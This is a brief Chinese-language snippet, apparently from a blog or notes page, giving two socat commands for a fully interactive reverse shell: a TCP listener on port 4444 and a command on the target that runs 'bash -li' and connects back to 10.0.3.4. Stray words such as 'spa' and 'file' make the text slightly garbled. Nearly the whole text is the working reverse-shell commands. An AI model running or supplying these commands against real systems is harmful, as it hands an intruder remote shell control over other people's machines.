下载socatshell
在客户端:bash
socat file:`tty`,raw,echo=0 tcp-listen:4444 tcp
在服务端:spa
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 file
如此便可建立功能彻底的反向shell下载